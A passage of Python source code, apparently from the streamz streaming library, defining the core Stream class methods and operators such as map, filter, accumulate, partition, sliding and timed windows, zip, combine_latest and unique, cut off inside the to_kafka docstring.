for downstream in self.downstreams:
if downstream:
downstream._inform_asynchronous(asynchronous)
def _add_upstream(self, upstream):
"""Add upstream to current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
if self.upstreams == [None]:
self.upstreams[0] = upstream
else:
self.upstreams.append(upstream)
def _add_downstream(self, downstream):
"""Add downstream to current downstreams"""
self.downstreams.add(downstream)
def _remove_downstream(self, downstream):
"""Remove downstream from current downstreams"""
self.downstreams.remove(downstream)
def _remove_upstream(self, upstream):
"""Remove upstream from current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
if len(self.upstreams) == 1:
self.upstreams[0] = [None]
else:
self.upstreams.remove(upstream)
@classmethod
def register_api(cls, modifier=identity, attribute_name=None):
""" Add callable to Stream API
This allows you to register a new method onto this class. You can use
it as a decorator.::
>>> @Stream.register_api()
... class foo(Stream):
... ...
>>> Stream().foo(...) # this works now
It attaches the callable as a normal attribute to the class object. In
doing so it respects inheritance (all subclasses of Stream will also
get the foo attribute).
By default callables are assumed to be instance methods. If you like
you can include modifiers to apply before attaching to the class as in
the following case where we construct a ``staticmethod``.
>>> @Stream.register_api(staticmethod)
... class foo(Stream):
... ...
>>> Stream.foo(...) # Foo operates as a static method
You can also provide an optional ``attribute_name`` argument to control
the name of the attribute your callable will be attached as.
>>> @Stream.register_api(attribute_name="bar")
... class foo(Stream):
... ...
>> Stream().bar(...) # foo was actually attached as bar
"""
def _(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
return func(*args, **kwargs)
name = attribute_name if attribute_name else func.__name__
setattr(cls, name, modifier(wrapped))
return func
return _
@classmethod
def register_plugin_entry_point(cls, entry_point, modifier=identity):
if hasattr(cls, entry_point.name):
raise ValueError(
f"Can't add {entry_point.name} from {entry_point.module_name} "
f"to {cls.__name__}: duplicate method name."
)
def stub(*args, **kwargs):
""" Entrypoints-based streamz plugin. Will be loaded on first call. """
node = entry_point.load()
if not issubclass(node, Stream):
raise TypeError(
f"Error loading {entry_point.name} "
f"from module {entry_point.module_name}: "
f"{node.__class__.__name__} must be a subclass of Stream"
)
if getattr(cls, entry_point.name).__name__ == "stub":
cls.register_api(
modifier=modifier, attribute_name=entry_point.name
)(node)
return node(*args, **kwargs)
cls.register_api(modifier=modifier, attribute_name=entry_point.name)(stub)
def start(self):
""" Start any upstream sources """
for upstream in self.upstreams:
upstream.start()
def __str__(self):
s_list = []
if self.name:
s_list.append('{}; {}'.format(self.name, self.__class__.__name__))
else:
s_list.append(self.__class__.__name__)
for m in self.str_list:
s = ''
at = getattr(self, m, None)
if at:
if not callable(at):
s = str(at)
elif hasattr(at, '__name__'):
s = getattr(self, m).__name__
elif hasattr(at.__class__, '__name__'):
s = getattr(self, m).__class__.__name__
else:
s = None
if s:
s_list.append('{}={}'.format(m, s))
if len(s_list) <= 2:
s_list = [term.split('=')[-1] for term in s_list]
text = "<"
text += s_list[0]
if len(s_list) > 1:
text += ': '
text += ', '.join(s_list[1:])
text += '>'
return text
__repr__ = __str__
def _ipython_display_(self, **kwargs): # pragma: no cover
try:
from ipywidgets import Output
from IPython.core.interactiveshell import InteractiveShell
except ImportError:
if hasattr(self, '_repr_html_'):
return self._repr_html_()
else:
return self.__repr__()
output = Output(_view_count=0)
output_ref = weakref.ref(output)
def update_cell(val):
output = output_ref()
if output is None:
return
with output:
content, *_ = InteractiveShell.instance().display_formatter.format(val)
output.outputs = ({'output_type': 'display_data',
'data': content,
'metadata': {}},)
s = self.map(update_cell)
_html_update_streams.add(s)
self.output_ref = output_ref
s_ref = weakref.ref(s)
def remove_stream(change):
output = output_ref()
if output is None:
return
if output._view_count == 0:
ss = s_ref()
ss.destroy()
_html_update_streams.remove(ss) # trigger gc
output.observe(remove_stream, '_view_count')
return output._ipython_display_(**kwargs)
def _emit(self, x, metadata=None):
"""
Push data into the stream at this point
Parameters
----------
x: any
an element of data
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
if metadata:
self._retain_refs(metadata, len(self.downstreams))
else:
metadata = []
result = []
for downstream in list(self.downstreams):
r = downstream.update(x, who=self, metadata=metadata)
if type(r) is list:
result.extend(r)
else:
result.append(r)
self._release_refs(metadata)
return [element for element in result if element is not None]
def emit(self, x, asynchronous=False, metadata=None):
""" Push data into the stream at this point
This is typically done only at source Streams but can theoretically be
done at any point
Parameters
----------
x: any
an element of data
asynchronous:
emit asynchronously
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
ts_async = getattr(thread_state, 'asynchronous', False)
if self.loop is None or asynchronous or self.asynchronous or ts_async:
if not ts_async:
thread_state.asynchronous = True
try:
result = self._emit(x, metadata=metadata)
if self.loop:
return gen.convert_yielded(result)
finally:
thread_state.asynchronous = ts_async
else:
@gen.coroutine
def _():
thread_state.asynchronous = True
try:
result = yield self._emit(x, metadata=metadata)
finally:
del thread_state.asynchronous
raise gen.Return(result)
sync(self.loop, _)
def update(self, x, who=None, metadata=None):
self._emit(x, metadata=metadata)
def gather(self):
""" This is a no-op for core streamz
This allows gather to be used in both dask and core streams
"""
return self
def connect(self, downstream):
""" Connect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to connect to
"""
self._add_downstream(downstream)
downstream._add_upstream(self)
def disconnect(self, downstream):
""" Disconnect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to disconnect from
"""
self._remove_downstream(downstream)
downstream._remove_upstream(self)
@property
def upstream(self):
if len(self.upstreams) != 1:
raise ValueError("Stream has multiple upstreams")
else:
return self.upstreams[0]
def destroy(self, streams=None):
"""
Disconnect this stream from any upstream sources
"""
if streams is None:
streams = self.upstreams
for upstream in list(streams):
upstream.downstreams.remove(self)
self.upstreams.remove(upstream)
def scatter(self, **kwargs):
from .dask import scatter
return scatter(self, **kwargs)
def remove(self, predicate):
""" Only pass through elements for which the predicate returns False """
return self.filter(lambda x: not predicate(x))
@property
def scan(self):
return self.accumulate
@property
def concat(self):
return self.flatten
def sink_to_list(self):
""" Append all elements of a stream to a list as they come in
Examples
--------
>>> source = Stream()
>>> L = source.map(lambda x: 10 * x).sink_to_list()
>>> for i in range(5):
... source.emit(i)
>>> L
[0, 10, 20, 30, 40]
"""
L = []
self.sink(L.append)
return L
def frequencies(self, **kwargs):
""" Count occurrences of elements """
def update_frequencies(last, x):
return toolz.assoc(last, x, last.get(x, 0) + 1)
return self.scan(update_frequencies, start={}, **kwargs)
def visualize(self, filename='mystream.png', **kwargs):
"""Render the computation of this object's task graph using graphviz.
Requires ``graphviz`` and ``networkx`` to be installed.
Parameters
----------
filename : str, optional
The name of the file to write to disk.
kwargs:
Graph attributes to pass to graphviz like ``rankdir="LR"``
"""
from .graph import visualize
return visualize(self, filename, **kwargs)
def to_dataframe(self, example):
""" Convert a stream of Pandas dataframes to a DataFrame
Examples
--------
>>> source = Stream()
>>> sdf = source.to_dataframe()
>>> L = sdf.groupby(sdf.x).y.mean().stream.sink_to_list()
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
"""
from .dataframe import DataFrame
return DataFrame(stream=self, example=example)
def to_batch(self, **kwargs):
""" Convert a stream of lists to a Batch
All elements of the stream are assumed to be lists or tuples
Examples
--------
>>> source = Stream()
>>> batches = source.to_batch()
>>> L = batches.pluck('value').map(inc).sum().stream.sink_to_list()
>>> source.emit([{'name': 'Alice', 'value': 1},
... {'name': 'Bob', 'value': 2},
... {'name': 'Charlie', 'value': 3}])
>>> source.emit([{'name': 'Alice', 'value': 4},
... {'name': 'Bob', 'value': 5},
... {'name': 'Charlie', 'value': 6}])
"""
from .batch import Batch
return Batch(stream=self, **kwargs)
def _retain_refs(self, metadata, n=1):
""" Retain all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].retain(n)
def _release_refs(self, metadata, n=1):
""" Release all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].release(n)
@Stream.register_api()
class sink(Stream):
""" Apply a function on every element
Examples
--------
>>> source = Stream()
>>> L = list()
>>> source.sink(L.append)
>>> source.sink(print)
>>> source.sink(print)
>>> source.emit(123)
123
123
>>> L
[123]
See Also
--------
map
Stream.sink_to_list
"""
_graphviz_shape = 'trapezium'
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# take the stream specific kwargs out
stream_name = kwargs.pop("stream_name", None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
_global_sinks.add(self)
def update(self, x, who=None, metadata=None):
result = self.func(x, *self.args, **self.kwargs)
if gen.isawaitable(result):
return result
else:
return []
@Stream.register_api()
class map(Stream):
""" Apply a function to every element in the stream
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.map(lambda x: 2*x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
try:
result = self.func(x, *self.args, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class starmap(Stream):
""" Apply a function to every element in the stream, splayed out
See ``itertools.starmap``
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.starmap(lambda a, b: a + b).sink(print)
>>> for i in range(5):
... source.emit((i, i))
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
y = x + self.args
try:
result = self.func(*y, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
def _truthy(x):
return not not x
@Stream.register_api()
class filter(Stream):
""" Only pass through elements that satisfy the predicate
Parameters
----------
predicate : function
The predicate. Should return True or False, where
True means that the predicate is satisfied.
*args :
The arguments to pass to the predicate.
**kwargs:
Keyword arguments to pass to predicate
Examples
--------
>>> source = Stream()
>>> source.filter(lambda x: x % 2 == 0).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
"""
def __init__(self, upstream, predicate, *args, **kwargs):
if predicate is None:
predicate = _truthy
self.predicate = predicate
stream_name = kwargs.pop("stream_name", None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.predicate(x, *self.args, **self.kwargs):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class accumulate(Stream):
""" Accumulate results with previous state
This performs running or cumulative reductions, applying the function
to the previous total and the new element. The function should take
two arguments, the previous accumulated state and the next element and
it should return a new accumulated state,
- ``state = func(previous_state, new_value)`` (returns_state=False)
- ``state, result = func(previous_state, new_value)`` (returns_state=True)
where the new_state is passed to the next invocation. The state or result
is emitted downstream for the two cases.
Parameters
----------
func: callable
start: object
Initial value, passed as the value of ``previous_state`` on the first
invocation. Defaults to the first submitted element
returns_state: boolean
If true then func should return both the state and the value to emit
If false then both values are the same, and func returns one value
**kwargs:
Keyword arguments to pass to func
Examples
--------
A running total, producing triangular numbers
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
1
3
6
10
A count of number of events (including the current one)
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + 1, start=0).sink(print)
>>> for _ in range(5):
... source.emit(0)
1
2
3
4
5
Like the builtin "enumerate".
>>> source = Stream()
>>> source.accumulate(lambda acc, x: ((acc[0] + 1, x), (acc[0], x)),
... start=(0, 0), returns_state=True
... ).sink(print)
>>> for i in range(3):
... source.emit(0)
(0, 0)
(1, 0)
(2, 0)
"""
_graphviz_shape = 'box'
def __init__(self, upstream, func, start=no_default, returns_state=False,
**kwargs):
self.func = func
self.kwargs = kwargs
self.state = start
self.returns_state = returns_state
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.with_state = kwargs.pop('with_state', False)
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.state is no_default:
self.state = x
if self.with_state:
return self._emit((self.state, x), metadata=metadata)
else:
return self._emit(x, metadata=metadata)
else:
try:
result = self.func(self.state, x, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
if self.returns_state:
state, result = result
else:
state = result
self.state = state
if self.with_state:
return self._emit((self.state, result), metadata=metadata)
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class slice(Stream):
"""
Get only some events in a stream by position. Works like list[] syntax.
Parameters
----------
start : int
First event to use. If None, start from the beginnning
end : int
Last event to use (non-inclusive). If None, continue without stopping.
Does not support negative indexing.
step : int
Pass on every Nth event. If None, pass every one.
Examples
--------
>>> source = Stream()
>>> source.slice(2, 6, 2).sink(print)
>>> for i in range(5):
... source.emit(0)
2
4
"""
def __init__(self, upstream, start=None, end=None, step=None, **kwargs):
self.state = 0
self.star = start or 0
self.end = end
self.step = step or 1
if any((_ or 0) < 0 for _ in [start, end, step]):
raise ValueError("Negative indices not supported by slice")
stream_name = kwargs.pop('stream_name', None)
Stream.__init__(self, upstream, stream_name=stream_name)
self._check_end()
def update(self, x, who=None, metadata=None):
if self.state >= self.star and self.state % self.step == 0:
self.emit(x, metadata=metadata)
self.state += 1
self._check_end()
def _check_end(self):
if self.end and self.state >= self.end:
# we're done
for upstream in self.upstreams:
upstream._remove_downstream(self)
@Stream.register_api()
class partition(Stream):
""" Partition stream into tuples of equal size
Parameters
----------
n: int
Maximum partition size
timeout: int or float, optional
Number of seconds after which a partition will be emitted,
even if its size is less than ``n``. If ``None`` (default),
a partition will be emitted only when its size reaches ``n``.
key: hashable or callable, optional
Emit items with the same key together as a separate partition.
If ``key`` is callable, partition will be identified by ``key(x)``,
otherwise by ``x[key]``. Defaults to ``None``.
Examples
--------
>>> source = Stream()
>>> source.partition(3).sink(print)
>>> for i in range(10):
... source.emit(i)
(0, 1, 2)
(3, 4, 5)
(6, 7, 8)
>>> source = Stream()
>>> source.partition(2, key=lambda x: x % 2).sink(print)
>>> for i in range(4):
... source.emit(i)
(0, 2)
(1, 3)
>>> from time import sleep
>>> source = Stream()
>>> source.partition(5, timeout=1).sink(print)
>>> for i in range(3):
... source.emit(i)
>>> sleep(1)
(0, 1, 2)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, timeout=None, key=None, **kwargs):
self.n = n
self._timeout = timeout
self._key = key
self._buffer = defaultdict(lambda: [])
self._metadata_buffer = defaultdict(lambda: [])
self._callbacks = {}
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
def _get_key(self, x):
if self._key is None:
return None
if callable(self._key):
return self._key(x)
return x[self._key]
@gen.coroutine
def _flush(self, key):
result, self._buffer[key] = self._buffer[key], []
metadata_result, self._metadata_buffer[key] = self._metadata_buffer[key], []
yield self._emit(tuple(result), list(metadata_result))
self._release_refs(metadata_result)
@gen.coroutine
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
key = self._get_key(x)
buffer = self._buffer[key]
metadata_buffer = self._metadata_buffer[key]
buffer.append(x)
if isinstance(metadata, list):
metadata_buffer.extend(metadata)
else:
metadata_buffer.append(metadata)
if len(buffer) == self.n:
if self._timeout is not None and self.n > 1:
self._callbacks[key].cancel()
yield self._flush(key)
return
if len(buffer) == 1 and self._timeout is not None:
self._callbacks[key] = self.loop.call_later(
self._timeout, self._flush, key
)
@Stream.register_api()
class sliding_window(Stream):
""" Produce overlapping tuples of size n
Parameters
----------
return_partial : bool
If True, yield tuples as soon as any events come in, each tuple being
smaller or equal to the window size. If False, only start yielding
tuples once a full window has accrued.
Examples
--------
>>> source = Stream()
>>> source.sliding_window(3, return_partial=False).sink(print)
>>> for i in range(8):
... source.emit(i)
(0, 1, 2)
(1, 2, 3)
(2, 3, 4)
(3, 4, 5)
(4, 5, 6)
(5, 6, 7)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, return_partial=True, **kwargs):
self.n = n
self._buffer = deque(maxlen=n)
self.metadata_buffer = deque(maxlen=n)
self.partial = return_partial
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self._buffer.append(x)
if not isinstance(metadata, list):
metadata = [metadata]
self.metadata_buffer.append(metadata)
if self.partial or len(self._buffer) == self.n:
flat_metadata = [m for ml in self.metadata_buffer for m in ml]
ret = self._emit(tuple(self._buffer), flat_metadata)
if len(self.metadata_buffer) == self.n:
completed = self.metadata_buffer.popleft()
self._release_refs(completed)
return ret
else:
return []
def convert_interval(interval):
if isinstance(interval, str):
import pandas as pd
interval = pd.Timedelta(interval).total_seconds()
return interval
@Stream.register_api()
class timed_window(Stream):
""" Emit a tuple of collected results every interval
Every ``interval`` seconds this emits a tuple of all of the results
seen so far. This can help to batch data coming off of a high-volume
stream.
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self._buffer = []
self.metadata_buffer = []
self.last = gen.moment
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._buffer.append(x)
self._retain_refs(metadata)
self.metadata_buffer.append(metadata)
return self.last
@gen.coroutine
def cb(self):
while True:
L, self._buffer = self._buffer, []
metadata, self.metadata_buffer = self.metadata_buffer, []
m = [m for ml in metadata for m in ml]
self.last = self._emit(L, m)
self._release_refs(m)
yield self.last
yield gen.sleep(self.interval)
@Stream.register_api()
class delay(Stream):
""" Add a time delay to results """
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.queue = Queue()
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
@gen.coroutine
def cb(self):
while True:
last = time()
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
duration = self.interval - (time() - last)
if duration > 0:
yield gen.sleep(duration)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@Stream.register_api()
class rate_limit(Stream):
""" Limit the flow of data
This stops two elements of streaming through in an interval shorter
than the provided value.
Parameters
----------
interval: float
Time in seconds
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.next = 0
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
@gen.coroutine
def update(self, x, who=None, metadata=None):
now = time()
old_next = self.next
self.next = max(now, self.next) + self.interval
if now < old_next:
yield gen.sleep(old_next - now)
yield self._emit(x, metadata=metadata)
@Stream.register_api()
class buffer(Stream):
""" Allow results to pile up at this point in the stream
This allows results to buffer in place at various points in the stream.
This can help to smooth flow through the system when backpressure is
applied.
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, **kwargs):
self.queue = Queue(maxsize=n)
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@gen.coroutine
def cb(self):
while True:
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
@Stream.register_api()
class zip(Stream):
""" Combine streams together into a stream of tuples
We emit a new tuple once all streams have produce a new tuple.
See also
--------
combine_latest
zip_latest
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
self.maxsize = kwargs.pop('maxsize', 10)
self.condition = Condition()
self.literals = [(i, val) for i, val in enumerate(upstreams)
if not isinstance(val, Stream)]
self.buffers = {upstream: deque()
for upstream in upstreams
if isinstance(upstream, Stream)}
upstreams2 = [upstream for upstream in upstreams if isinstance(upstream, Stream)]
Stream.__init__(self, upstreams=upstreams2, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of buffer for new stream
self.buffers[upstream] = deque()
super(zip, self)._add_upstream(upstream)
def _remove_upstream(self, upstream):
# Override method to handle removal of buffer for stream
self.buffers.pop(upstream)
super(zip, self)._remove_upstream(upstream)
def pack_literals(self, tup):
""" Fill buffers for literals whenever we empty them """
inp = list(tup)[::-1]
out = []
for i, val in self.literals:
while len(out) < i:
out.append(inp.pop())
out.append(val)
while inp:
out.append(inp.pop())
return tuple(out)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
L = self.buffers[who] # get buffer for stream
L.append((x, metadata))
if len(L) == 1 and all(self.buffers.values()):
vals = [self.buffers[up][0] for up in self.upstreams]
tup, md = __builtins__['zip'](*vals)
for buf in self.buffers.values():
buf.popleft()
self.condition.notify_all()
if self.literals:
tup = self.pack_literals(tup)
md = [m for ml in md for m in ml]
ret = self._emit(tup, md)
self._release_refs(md)
return ret
elif len(L) > self.maxsize:
return self.condition.wait()
@Stream.register_api()
class combine_latest(Stream):
""" Combine multiple streams together to a stream of tuples
This will emit a new tuple of all of the most recent elements seen from
any stream.
Parameters
----------
emit_on : stream or list of streams or None
only emit upon update of the streams listed.
If None, emit on update from any stream
See Also
--------
zip
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
emit_on = kwargs.pop('emit_on', None)
self._initial_emit_on = emit_on
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
if emit_on is not None:
if not isinstance(emit_on, Iterable):
emit_on = (emit_on, )
emit_on = tuple(
upstreams[x] if isinstance(x, int) else x for x in emit_on)
self.emit_on = emit_on
else:
self.emit_on = upstreams
Stream.__init__(self, upstreams=upstreams, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of last and missing for new stream
self.last.append(None)
self.metadata.append(None)
self.missing.update([upstream])
super(combine_latest, self)._add_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def _remove_upstream(self, upstream):
# Override method to handle removal of last and missing for stream
if self.emit_on == upstream:
raise RuntimeError("Can't remove the ``emit_on`` stream since that"
"would cause no data to be emitted. "
"Consider adding an ``emit_on`` first by "
"running ``node.emit_on=(upstream,)`` to add "
"a new ``emit_on`` or running "
"``node.emit_on=tuple(node.upstreams)`` to "
"emit on all incoming data")
self.last.pop(self.upstreams.index(upstream))
self.metadata.pop(self.upstreams.index(upstream))
self.missing.remove(upstream)
super(combine_latest, self)._remove_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
if self.missing and who in self.missing:
self.missing.remove(who)
self.last[idx] = x
if not self.missing and who in self.emit_on:
tup = tuple(self.last)
md = [m for ml in self.metadata for m in ml]
return self._emit(tup, md)
@Stream.register_api()
class flatten(Stream):
""" Flatten streams of lists or iterables into a stream of elements
Examples
--------
>>> source = Stream()
>>> source.flatten().sink(print)
>>> for x in [[1, 2, 3], [4, 5], [6, 7, 7]]:
... source.emit(x)
1
2
3
4
5
6
7
See Also
--------
partition
"""
def update(self, x, who=None, metadata=None):
L = []
for i, item in enumerate(x):
if i == len(x) - 1:
y = self._emit(item, metadata=metadata)
else:
y = self._emit(item)
if type(y) is list:
L.extend(y)
else:
L.append(y)
return L
@Stream.register_api()
class unique(Stream):
""" Avoid sending through repeated elements
This deduplicates a stream so that only new elements pass through.
You can control how much of a history is stored with the ``maxsize=``
parameter. For example setting ``maxsize=1`` avoids sending through
elements when one is repeated right after the other.
Parameters
----------
maxsize: int or None, optional
number of stored unique values to check against
key : function, optional
Function which returns a representation of the incoming data.
For example ``key=lambda x: x['a']`` could be used to allow only
pieces of data with unique ``'a'`` values to pass through.
hashable : bool, optional
If True then data is assumed to be hashable, else it is not. This is
used for determining how to cache the history, if hashable then
either dicts or LRU caches are used, otherwise a deque is used.
Defaults to True.
Examples
--------
>>> source = Stream()
>>> source.unique(maxsize=1).sink(print)
>>> for x in [1, 1, 2, 2, 2, 1, 3]:
... source.emit(x)
1
2
1
3
"""
def __init__(self, upstream, maxsize=None, key=identity, hashable=True,
**kwargs):
self.key = key
self.maxsize = maxsize
if hashable:
self.seen = dict()
if self.maxsize:
from zict import LRU
self.seen = LRU(self.maxsize, self.seen)
else:
self.seen = []
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
y = self.key(x)
emit = True
if isinstance(self.seen, list):
if y in self.seen:
self.seen.remove(y)
emit = False
self.seen.insert(0, y)
if self.maxsize:
del self.seen[self.maxsize:]
if emit:
return self._emit(x, metadata=metadata)
else:
if self.seen.get(y, '~~not_seen~~') == '~~not_seen~~':
self.seen[y] = 1
return self._emit(x, metadata=metadata)
@Stream.register_api()
class union(Stream):
""" Combine multiple streams into one
Every element from any of the upstreams streams will immediately flow
into the output stream. They will not be combined with elements from
other streams.
See also
--------
Stream.zip
Stream.combine_latest
"""
def __init__(self, *upstreams, **kwargs):
super(union, self).__init__(upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class pluck(Stream):
""" Select elements from elements in the stream.
Parameters
----------
pluck : object, list
The element(s) to pick from the incoming element in the stream
If an instance of list, will pick multiple elements.
Examples
--------
>>> source = Stream()
>>> source.pluck([0, 3]).sink(print)
>>> for x in [[1, 2, 3, 4], [4, 5, 6, 7], [8, 9, 10, 11]]:
... source.emit(x)
(1, 4)
(4, 7)
(8, 11)
>>> source = Stream()
>>> source.pluck('name').sink(print)
>>> for x in [{'name': 'Alice', 'x': 123}, {'name': 'Bob', 'x': 456}]:
... source.emit(x)
'Alice'
'Bob'
"""
def __init__(self, upstream, pick, **kwargs):
self.pick = pick
super(pluck, self).__init__(upstream, **kwargs)
def update(self, x, who=None, metadata=None):
if isinstance(self.pick, list):
return self._emit(tuple([x[ind] for ind in self.pick]),
metadata=metadata)
else:
return self._emit(x[self.pick], metadata=metadata)
@Stream.register_api()
class collect(Stream):
"""
Hold elements in a cache and emit them as a collection when flushed.
Examples
--------
>>> source1 = Stream()
>>> source2 = Stream()
>>> collector = collect(source1)
>>> collector.sink(print)
>>> source2.sink(collector.flush)
>>> source1.emit(1)
>>> source1.emit(2)
>>> source2.emit('anything') # flushes collector
...
[1, 2]
"""
def __init__(self, upstream, cache=None, metadata_cache=None, **kwargs):
if cache is None:
cache = deque()
self.cache = cache
if metadata_cache is None:
metadata_cache = deque()
self.metadata_cache = metadata_cache
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self.cache.append(x)
if metadata:
if isinstance(metadata, list):
self.metadata_cache.extend(metadata)
else:
self.metadata_cache.append(metadata)
def flush(self, _=None):
out = tuple(self.cache)
metadata = list(self.metadata_cache)
self._emit(out, metadata)
self._release_refs(metadata)
self.cache.clear()
self.metadata_cache.clear()
@Stream.register_api()
class zip_latest(Stream):
"""Combine multiple streams together to a stream of tuples
The stream which this is called from is lossless. All elements from
the lossless stream are emitted reguardless of when they came in.
This will emit a new tuple consisting of an element from the lossless
stream paired with the latest elements from the other streams.
Elements are only emitted when an element on the lossless stream are
received, similar to ``combine_latest`` with the ``emit_on`` flag.
See Also
--------
Stream.combine_latest
Stream.zip
"""
def __init__(self, lossless, *upstreams, **kwargs):
upstreams = (lossless,) + upstreams
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
self.lossless = lossless
self.lossless_buffer = deque()
Stream.__init__(self, upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if who is self.lossless:
self.lossless_buffer.append((x, metadata))
elif self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
self.last[idx] = x
if self.missing and who in self.missing:
self.missing.remove(who)
if not self.missing:
L = []
while self.lossless_buffer:
self.last[0], self.metadata[0] = self.lossless_buffer.popleft()
md = [m for ml in self.metadata for m in ml]
L.append(self._emit(tuple(self.last), md))
self._release_refs(self.metadata[0])
return L
@Stream.register_api()
class latest(Stream):
""" Drop held-up data and emit the latest result
This allows you to skip intermediate elements in the stream if there is
some back pressure causing a slowdown. Use this when you only care about
the latest elements, and are willing to lose older data.
This passes through values without modification otherwise.
Examples
--------
>>> source.map(f).latest().map(g) # doctest: +SKIP
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, **kwargs):
self.condition = Condition()
self.next = []
self.next_metadata = None
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
if self.next_metadata:
self._release_refs(self.next_metadata)
self._retain_refs(metadata)
self.next = [x]
self.next_metadata = metadata
self.loop.add_callback(self.condition.notify)
@gen.coroutine
def cb(self):
while True:
yield self.condition.wait()
[x] = self.next
yield self._emit(x, self.next_metadata)
@Stream.register_api()
class to_kafka(Stream):
""" Writes data in the stream to Kafka
This stream accepts a string or bytes object. Call ``flush`` to ensure all
